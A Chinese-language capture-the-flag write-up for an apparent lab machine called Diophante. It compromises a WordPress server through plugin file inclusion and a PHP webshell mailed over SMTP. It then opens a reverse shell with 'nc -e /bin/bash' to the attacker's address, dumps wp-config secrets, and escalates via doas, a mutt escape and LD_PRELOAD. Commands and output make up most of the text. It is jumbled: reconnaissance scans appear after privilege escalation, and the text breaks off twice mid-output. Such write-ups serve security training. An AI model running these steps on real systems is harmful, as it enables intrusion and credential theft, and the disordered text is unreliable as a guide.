(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsabine:x:1000:1000:sabine,,,:\/home\/sabine:\/bin\/rbash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL Server,,,:\/nonexistent:\/bin\/false\npostfix:x:107:114::\/var\/spool\/postfix:\/usr\/sbin\/nologin\nleonard:x:1001:1001:,,,:\/home\/leonard:\/bin\/bash\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u90ae\u4ef6\u4e0a\u4f20webshell<\/h3>\n
\u7531\u4e8e\u5df2\u7ecf\u6709\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2ashell<\/code>\u5c31\u80fdRCE<\/code>\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528 smtp \u529f\u80fd\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n\n\u8fd9\u91cc\u5bf9\u673a\u5b50\u62cd\u4e2a\u5feb\u7167\uff0c\u514d\u5f97\u5931\u8d25\u4e86\u9ebb\u70e6\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u5982\u679c\u6ca1\u4e0a\u9762\u90a3\u5de5\u5177\u680f\uff0c\u4f7f\u7528\u53f3\u8fb9\u7684 ctrl+f \u6216\u8005 c \u8bd5\u8bd5<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ telnet $IP 25\nTrying 192.168.10.107...\nConnected to 192.168.10.107.\nEscape character is '^]'.\n220 debian ESMTP Postfix (Debian\/GNU)\nhelo abc\n250 debian\nMAIL FROM: kali@kali.com\n250 2.1.0 Ok\nRCPT TO: sabine\n250 2.1.5 Ok\ndata\n354 End data with <CR><LF>.<CR><LF>\n<?=`$_GET[0]`?> \n.\n250 2.0.0 Ok: queued as 167E180ABD\nquit\n221 2.0.0 Bye\nConnection closed by foreign host.<\/code><\/pre>\n\u7528\u6237\u662f\u6700\u5f00\u59cb\u4fe1\u606f\u641c\u96c6\u65f6\u5019wpscan<\/code>\u626b\u5230\u7684\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u8fdb\u884c\u6267\u884c\u547d\u4ee4\uff01<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&0=whoami" --output - \nFrom kali@kali.com Sat Jun 14 04:11:43 2025\nReturn-Path: <kali@kali.com>\nX-Original-To: sabine\nDelivered-To: sabine@debian\nReceived: from abc (unknown [192.168.10.102])\n by debian (Postfix) with SMTP id 167E180ABD\n for <sabine>; Sat, 14 Jun 2025 04:10:22 +0200 (CEST)\n\nwww-data\n\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u6267\u884c\u6210\u529f\uff0c\u8bbe\u7f6e\u76d1\u542c\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&0=nc+-e+\/bin\/bash+192.168.10.102+1234" --output -<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@diophante:\/var\/www\/html\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes$ cd ~\n(remote) www-data@diophante:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 .\ndrwxr-xr-x 12 root root 4096 Apr 7 2021 ..\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 html\n(remote) www-data@diophante:\/var\/www$ cd html\n(remote) www-data@diophante:\/var\/www\/html$ ls -la\ntotal 28\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 ..\ndrwxr-xr-x 5 www-data www-data 4096 Apr 14 2021 blog\n-rw-r--r-- 1 www-data www-data 10701 Apr 7 2021 index.html\n-rw-r--r-- 1 www-data www-data 36 Apr 14 2021 note.txt\n(remote) www-data@diophante:\/var\/www\/html$ cd blog\n(remote) www-data@diophante:\/var\/www\/html\/blog$ ls -la\ntotal 228\ndrwxr-xr-x 5 www-data www-data 4096 Apr 14 2021 .\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 ..\n-rw-r--r-- 1 www-data www-data 299 Apr 7 2021 .htaccess\n-rw-r--r-- 1 www-data www-data 405 Apr 7 2021 index.php\n-rw-r--r-- 1 www-data www-data 19915 Apr 7 2021 license.txt\n-rw-r--r-- 1 www-data www-data 8852 Apr 7 2021 readme.html\n-rw-r--r-- 1 www-data www-data 7165 Apr 7 2021 wp-activate.php\ndrwxr-xr-x 9 www-data www-data 4096 Apr 7 2021 wp-admin\n-rw-r--r-- 1 www-data www-data 351 Apr 7 2021 wp-blog-header.php\n-rw-r--r-- 1 www-data www-data 2328 Apr 7 2021 wp-comments-post.php\n-rw-r--r-- 1 www-data www-data 3538 Apr 7 2021 wp-config-sample.php\n-rw-rw-rw- 1 www-data www-data 3812 Apr 7 2021 wp-config.php\ndrwxr-xr-x 7 www-data www-data 4096 Jun 14 03:53 wp-content\n-rw-r--r-- 1 www-data www-data 3939 Apr 7 2021 wp-cron.php\ndrwxr-xr-x 25 www-data www-data 12288 Apr 7 2021 wp-includes\n-rw-r--r-- 1 www-data www-data 2496 Apr 7 2021 wp-links-opml.php\n-rw-r--r-- 1 www-data www-data 3313 Apr 7 2021 wp-load.php\n-rw-r--r-- 1 www-data www-data 44993 Apr 7 2021 wp-login.php\n-rw-r--r-- 1 www-data www-data 8509 Apr 7 2021 wp-mail.php\n-rw-r--r-- 1 www-data www-data 21125 Apr 7 2021 wp-settings.php\n-rw-r--r-- 1 www-data www-data 31328 Apr 7 2021 wp-signup.php\n-rw-r--r-- 1 www-data www-data 4747 Apr 7 2021 wp-trackback.php\n-rw-r--r-- 1 www-data www-data 3236 Apr 7 2021 xmlrpc.php\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cat wp-config.php\n<?php\n\/**\n * La configuration de base de votre installation WordPress.\n *\n * Ce fichier est utilis\u00e9 par le script de cr\u00e9ation de wp-config.php pendant\n * le processus d\u2019installation. Vous n\u2019avez pas \u00e0 utiliser le site web, vous\n * pouvez simplement renommer ce fichier en \u00ab wp-config.php \u00bb et remplir les\n * valeurs.\n *\n * Ce fichier contient les r\u00e9glages de configuration suivants :\n *\n * R\u00e9glages MySQL\n * Pr\u00e9fixe de table\n * Cl\u00e9s secr\u00e8tes\n * Langue utilis\u00e9e\n * ABSPATH\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/editing-wp-config-php\/.\n *\n * @package WordPress\n *\/\n\n\/\/ ** R\u00e9glages MySQL - Votre h\u00e9bergeur doit vous fournir ces informations. ** \/\/\n\/** Nom de la base de donn\u00e9es de WordPress. *\/\ndefine( 'DB_NAME', 'wordpress' );\n\n\/** Utilisateur de la base de donn\u00e9es MySQL. *\/\ndefine( 'DB_USER', 'wpuser' );\n\n\/** Mot de passe de la base de donn\u00e9es MySQL. *\/\ndefine( 'DB_PASSWORD', 'wppassword' );\n\n\/** Adresse de l\u2019h\u00e9bergement MySQL. *\/\ndefine( 'DB_HOST', 'localhost' );\n\n\/** Jeu de caract\u00e8res \u00e0 utiliser par la base de donn\u00e9es lors de la cr\u00e9ation des tables. *\/\ndefine( 'DB_CHARSET', 'utf8mb4' );\n\n\/**\n * Type de collation de la base de donn\u00e9es.\n * N\u2019y touchez que si vous savez ce que vous faites.\n *\/\ndefine( 'DB_COLLATE', '' );\n\n\/**#@+\n * Cl\u00e9s uniques d\u2019authentification et salage.\n *\n * Remplacez les valeurs par d\u00e9faut par des phrases uniques !\n * Vous pouvez g\u00e9n\u00e9rer des phrases al\u00e9atoires en utilisant\n * {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ le service de cl\u00e9s secr\u00e8tes de WordPress.org}.\n * Vous pouvez modifier ces phrases \u00e0 n\u2019importe quel moment, afin d\u2019invalider tous les cookies existants.\n * Cela forcera \u00e9galement tous les utilisateurs \u00e0 se reconnecter.\n *\n * @since 2.6.0\n *\/\ndefine( 'AUTH_KEY', '#,g><LSZX0HW]D<yRmgs&Wf8TZgQ:J3]+`X6iZ1`Eq%j$jLId(g;>rFU.R]~FN:l' );\ndefine( 'SECURE_AUTH_KEY', 'OvszI?ZXB2tO=s=e;JCT{r[*[wU4HYjN]Ul;QSrnhq|M=x8fJjf4,T.ek^|t*)oE' );\ndefine( 'LOGGED_IN_KEY', '+B!0BXPa#n\/dITg~>`y1Ns|?=Kw|Ph)W!:IY!c?KB-vkmXLh.961;wkd+.i>o!>7' );\ndefine( 'NONCE_KEY', ':tF;H[_jOV,:H*~<EYS3:jCGpvHM8\/:=V{-NDl2d36\/ivnA@EFG8q7cQ%SJEW8Y3' );\ndefine( 'AUTH_SALT', 'rVEb=RPOZG]`pQm2Vv?8k$|7SS+)MshG1sI8RZN.2Plwk#J)O75d1Q%|TuE()lE$' );\ndefine( 'SECURE_AUTH_SALT', 'yg4jQXSs=[xb-Y3[!3shWt,UK3T:[+`Yi\/8{#w|r]x6#+$VIV+*4<2.&@]!3NAH8' );\ndefine( 'LOGGED_IN_SALT', 'a73Rg9qLRDaGbfEU9-y&$BY7~vLQ+gqGhAdzj8C:X d}j.GKn>5NSoC!,sPGD^ke' );\ndefine( 'NONCE_SALT', ') F1enYj2.O5.:UWZ0CS{5y~i[JZ0FRC`X_q3r0\/T?=naqS$N*weR-059*uTXXh7' );\n\/**#@-*\/\n\n\/**\n * Pr\u00e9fixe de base de donn\u00e9es pour les tables de WordPress.\n *\n * Vous pouvez installer plusieurs WordPress sur une seule base de donn\u00e9es\n * si vous leur donnez chacune un pr\u00e9fixe unique.\n * N\u2019utilisez que des chiffres, des lettres non-accentu\u00e9es, et des caract\u00e8res soulign\u00e9s !\n *\/\n$table_prefix = 'wp_';\n\n\/**\n * Pour les d\u00e9veloppeurs : le mode d\u00e9boguage de WordPress.\n *\n * En passant la valeur suivante \u00e0 "true", vous activez l\u2019affichage des\n * notifications d\u2019erreurs pendant vos essais.\n * Il est fortement recommand\u00e9 que les d\u00e9veloppeurs d\u2019extensions et\n * de th\u00e8mes se servent de WP_DEBUG dans leur environnement de\n * d\u00e9veloppement.\n *\n * Pour plus d\u2019information sur les autres constantes qui peuvent \u00eatre utilis\u00e9es\n * pour le d\u00e9boguage, rendez-vous sur le Codex.\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/debugging-in-wordpress\/\n *\/\ndefine( 'WP_DEBUG', false );\n\n\/* C\u2019est tout, ne touchez pas \u00e0 ce qui suit ! Bonne publication. *\/\n\n\/** Chemin absolu vers le dossier de WordPress. *\/\nif ( ! defined( 'ABSPATH' ) )\n define( 'ABSPATH', dirname( __FILE__ ) . '\/' );\n\n\/** R\u00e9glage des variables de WordPress et de ses fichiers inclus. *\/\nrequire_once( ABSPATH . 'wp-settings.php' );<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u4f46\u662f\u5168\u662f\u9ed8\u8ba4\u7528\u6237\u5bc6\u7801\uff0c\u5148\u4e0d\u8fdb\u884c\u5c1d\u8bd5\u3002<\/p>\n
setsid\u5207\u6362\u7528\u6237<\/h3>\n
\u770b\u770b\u522b\u7684\uff1a<\/p>\n
(remote) www-data@diophante:\/var\/www\/html\/blog$ cat \/etc\/passwd | grep sh | cut -d: -f1\nBinary file (standard input) matches\n(remote) www-data@diophante:\/var\/www\/html\/blog$ echo $SHELL\n\/usr\/sbin\/nologin\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cd \/home\n(remote) www-data@diophante:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 6 2021 ..\ndrwxr-xr-x 5 leonard leonard 4096 Apr 14 2021 leonard\ndrwxr-xr-x 5 sabine sabine 4096 Apr 8 2021 sabine\n(remote) www-data@diophante:\/home$ cd leonard\/\n(remote) www-data@diophante:\/home\/leonard$ ls -la\ntotal 44\ndrwxr-xr-x 5 leonard leonard 4096 Apr 14 2021 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 leonard leonard 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 leonard leonard 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr 7 2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr 7 2021 .local\n-rw-r--r-- 1 leonard leonard 807 Apr 7 2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr 8 2021 .ssh\n-rw-r--r-- 1 leonard leonard 209 Apr 7 2021 .wget-hsts\n-rwx------ 1 leonard leonard 16 Apr 8 2021 user.txt\n(remote) www-data@diophante:\/home\/leonard$ cd ..\/sabine\/\n(remote) www-data@diophante:\/home\/sabine$ ls -la\ntotal 36\ndrwxr-xr-x 5 sabine sabine 4096 Apr 8 2021 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 sabine sabine 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 root root 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 sabine sabine 220 Apr 6 2021 .bash_logout\n-rw-r--r-- 1 sabine sabine 3526 Apr 6 2021 .bashrc\ndrwx------ 3 sabine sabine 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 sabine sabine 4096 Apr 7 2021 .local\n-rw-r--r-- 1 sabine sabine 807 Apr 6 2021 .profile\ndrwx------ 2 sabine sabine 4096 Apr 14 2021 .ssh\n(remote) www-data@diophante:\/home\/sabine$ cd ~\n(remote) www-data@diophante:\/var\/www$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/xclip\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/doas\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pppd\n(remote) www-data@diophante:\/var\/www$ find \/ -name "*doas*" 2>\/dev\/null\n\/var\/lib\/dpkg\/info\/doas.conffiles\n\/var\/lib\/dpkg\/info\/doas.md5sums\n\/var\/lib\/dpkg\/info\/doas.list\n\/etc\/pam.d\/doas\n\/etc\/doas.conf\n\/usr\/share\/doc\/doas\n\/usr\/share\/lintian\/overrides\/doas\n\/usr\/share\/man\/man5\/doas.conf.5.gz\n\/usr\/share\/man\/man1\/doas.1.gz\n\/usr\/bin\/doas\n(remote) www-data@diophante:\/var\/www$ cat \/etc\/doas.conf\npermit nopass www-data as sabine cmd \/usr\/bin\/setsid\npermit nopass sabine as leonard cmd \/usr\/bin\/mutt<\/code><\/pre>\n\u53d1\u73b0www-data<\/code>\u7528\u6237\u53ef\u4ee5\u4ee5 sabine \u8eab\u4efd\u6267\u884c setsid\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr setsid \n\n Run a program in a new session if the calling process is not a process group leader.\n The created session is by default not controlled by the current terminal.\n More information: <https:\/\/manned.org\/setsid>.\n\n Run a program in a new session:\n\n setsid program\n\n Run a program in a new session discarding the resulting output and error:\n\n setsid program > \/dev\/null 2>&1\n\n Run a program creating a new process:\n\n setsid [-f|--fork] program\n\n Return the exit code of a program as the exit code of setsid when the program exits:\n\n setsid [-w|--wait] program\n\n Run a program in a new session setting the current terminal as the controlling terminal:\n\n setsid [-c|--ctty] program<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e00\u4e2a\u521b\u5efa\u4f1a\u8bdd\u7684\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\/usr\/bin\/doas -u sabine \/usr\/bin\/setsid \/bin\/bash<\/code><\/pre>\n<\/div><\/p>\n\u5207\u6362\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n
mutt\u63d0\u6743\u7528\u6237<\/h3>\n
\u540c\u65f6\u6ce8\u610f\u5230\u521a\u521asabine as leonard cmd \/usr\/bin\/mutt<\/code>\uff0csabine\u4e5f\u6709\u7279\u6b8a\u6743\u9650\uff0c\u770b\u770b\u8fd9\u4e2amutt<\/code>\u662f\u5565\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr mutt \n\n Command-line email client.\n More information: <http:\/\/mutt.org\/doc\/mutt.1.txt>.\n\n Open the specified mailbox:\n\n mutt -f mailbox\n\n Send an email and specify a subject and a cc recipient:\n\n mutt -s subject -c cc@example.com recipient@example.com\n\n Send an email with files attached:\n\n mutt -a file1 file2 -- recipient@example.com\n\n Specify a file to include as the message body:\n\n mutt -i path\/to\/file recipient@example.com\n\n Specify a draft file containing the header and the body of the message, in RFC 5322 format:\n\n mutt -H path\/to\/file recipient@example.com<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e2a\u90ae\u4ef6\u5ba2\u6237\u7aef\uff0c\u6253\u5f00\u5148\u770b\u4e00\u4e0b\uff1a<\/p>\n
\/usr\/bin\/doas -u leonard \/usr\/bin\/mutt<\/code><\/pre>\n<\/div><\/p>\n\u538b\u6839\u770b\u4e0d\u6e05\u3002\u3002\u3002\u3002\u778e\u6309\uff0c\u8054\u60f3\u5230Orasi<\/code>\u9776\u573a\uff0c\u770b\u4e86\u4e00\u4e0b\u76f8\u5173\u547d\u4ee4\uff0c\u53d1\u73b0\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff0c\u6309\u51e0\u4e0b esc \u518d\u6309\u51e0\u4e0b!<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u7136\u540e\/bin\/bash<\/code>\u5373\u53ef\u5207\u6362\u7528\u6237\u3002\u3002\u3002<\/p>\n<\/div><\/p>\nLD\u52ab\u6301root<\/h3>\nleonard@diophante:~$ ls -la\ntotal 48\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 leonard leonard 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 leonard leonard 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr 7 2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr 7 2021 .local\n-rw-r--r-- 1 leonard leonard 807 Apr 7 2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr 8 2021 .ssh\n-rw-r--r-- 1 leonard leonard 209 Apr 7 2021 .wget-hsts\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 Mail\n-rwx------ 1 leonard leonard 16 Apr 8 2021 user.txt\nleonard@diophante:~$ cat user.txt \nThonirburarnlog\nleonard@diophante:~$ cd Mail\/\nleonard@diophante:~\/Mail$ ls -la\ntotal 8\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 ..\nleonard@diophante:~\/Mail$ cd ..\/\nleonard@diophante:~$ sudo -l\nMatching Defaults entries for leonard on diophante:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, env_keep+=LD_PRELOAD\n\nUser leonard may run the following commands on diophante:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/ping<\/code><\/pre>\n\u6ce8\u610f\u5230env_keep+=LD_PRELOAD<\/code>\uff0c\u610f\u601d\u662f\u4e5f\u4f1a\u4fdd\u5b58\u6211\u4eec\u6307\u5b9a\u7684\u52a8\u6001\u94fe\u63a5\u5e93\uff0c\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\uff0c\u5148\u770b\u770bping<\/code>\u6709\u5565\u51fd\u6570\uff1a<\/p>\nleonard@diophante:~$ ping -V\nping utility, iputils-s20180629<\/code><\/pre>\n\u627e\u5230\u5f53\u65f6\u7684\u90a3\u4e2a\u7248\u672c\uff0c\u4e0b\u8f7d\u4e0b\u6765\uff0c\u770b\u770b\u6e90\u4ee3\u7801\u6709\u4e9b\u5565\uff1ahttps:\/\/github.com\/iputils\/iputils\/releases\/tag\/s20180629<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n| 256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n| 256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open smtp syn-ack ttl 64 Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after: 2031-04-05T07:11:28\n| MD5: 57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD OPTIONS\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 22>\/dev\/null\n\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/192.168.10.107\/\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.11.0\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83d\udcb2 Extensions \u2502 [html, txt, php]\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 